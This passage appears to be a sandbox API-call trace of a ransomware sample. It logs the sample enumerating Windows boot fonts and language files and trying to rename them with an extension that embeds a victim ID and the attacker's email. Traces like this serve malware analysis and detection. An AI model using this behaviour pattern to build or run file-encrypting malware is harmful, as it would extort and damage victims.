returned 0 [0059.534] SetEvent (hEvent=0x2e8) returned 1 [0059.534] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.534] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.536] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=3878410) returned 1 [0059.536] CloseHandle (hObject=0x300) returned 1 [0059.536] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf")) returned 0x20 [0059.536] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0 [0059.536] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf")) returned 0 [0059.536] SetEvent (hEvent=0x2e8) returned 1 [0059.536] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.536] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.538] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=1985867) returned 1 [0059.538] CloseHandle (hObject=0x300) returned 1 [0059.538] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0x20 [0059.538] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0 [0059.539] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0 [0059.539] SetEvent (hEvent=0x2e8) returned 1 [0059.539] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.539] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.540] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=2373000) returned 1 [0059.540] CloseHandle (hObject=0x314) returned 1 [0059.540] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0x20 [0059.540] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0 [0059.540] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0 [0059.541] SetEvent (hEvent=0x2e8) returned 1 [0059.541] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.541] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.542] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=174959) returned 1 [0059.542] CloseHandle (hObject=0x314) returned 1 [0059.542] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf")) returned 0x20 [0059.542] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\malgunn_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.542] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.542] SetEvent (hEvent=0x2e8) returned 1 [0059.542] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.542] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.544] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=177414) returned 1 [0059.544] CloseHandle (hObject=0x314) returned 1 [0059.544] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf")) returned 0x20 [0059.544] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\malgun_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.544] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.544] SetEvent (hEvent=0x2e8) returned 1 [0059.544] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.544] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0059.547] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=143754) returned 1 [0059.547] CloseHandle (hObject=0x31c) returned 1 [0059.547] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf")) returned 0x20 [0059.548] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\meiryon_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.548] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.548] SetEvent (hEvent=0x2e8) returned 1 [0059.548] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.548] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0059.549] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=145419) returned 1 [0059.549] CloseHandle (hObject=0x318) returned 1 [0059.549] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf")) returned 0x20 [0059.549] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\meiryo_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.549] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.550] SetEvent (hEvent=0x2e8) returned 1 [0059.550] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.550] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0059.550] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=162331) returned 1 [0059.550] CloseHandle (hObject=0x318) returned 1 [0059.550] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf")) returned 0x20 [0059.550] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msjhn_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.550] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.550] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.550] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.551] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=164347) returned 1 [0059.551] CloseHandle (hObject=0x314) returned 1 [0059.551] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf")) returned 0x20 [0059.551] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msjh_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.551] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.552] SetEvent (hEvent=0x2e8) returned 1 [0059.552] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.552] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.552] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=154427) returned 1 [0059.552] CloseHandle (hObject=0x314) returned 1 [0059.552] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf")) returned 0x20 [0059.555] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msyhn_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.555] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.555] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.555] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.556] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=156245) returned 1 [0059.556] CloseHandle (hObject=0x314) returned 1 [0059.556] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf")) returned 0x20 [0059.556] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msyh_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.556] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.556] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.556] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.557] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=44859) returned 1 [0059.557] CloseHandle (hObject=0x314) returned 1 [0059.557] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf")) returned 0x20 [0059.557] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segmono_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.557] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.557] SetEvent (hEvent=0x2e8) returned 1 [0059.557] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.557] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.557] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=85862) returned 1 [0059.557] CloseHandle (hObject=0x314) returned 1 [0059.557] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf")) returned 0x20 [0059.557] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segoen_slboot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.557] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.558] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.558] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.558] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=86178) returned 1 [0059.558] CloseHandle (hObject=0x314) returned 1 [0059.558] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf")) returned 0x20 [0059.558] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segoe_slboot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.558] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.558] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.558] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.558] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=49091) returned 1 [0059.558] CloseHandle (hObject=0x314) returned 1 [0059.558] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf")) returned 0x20 [0059.559] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.559] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.559] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.559] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.559] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=79200) returned 1 [0059.559] CloseHandle (hObject=0x314) returned 1 [0059.559] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui")) returned 0x20 [0059.559] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fr-CA\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.559] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.559] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.559] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.559] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=79192) returned 1 [0059.560] CloseHandle (hObject=0x314) returned 1 [0059.560] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui")) returned 0x20 [0059.560] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.560] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.560] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.560] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.560] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=45984) returned 1 [0059.560] CloseHandle (hObject=0x314) returned 1 [0059.560] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui")) returned 0x20 [0059.560] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.560] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.560] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.560] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.561] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=76640) returned 1 [0059.561] CloseHandle (hObject=0x314) returned 1 [0059.561] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui")) returned 0x20 [0059.561] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\hr-HR\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.561] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: 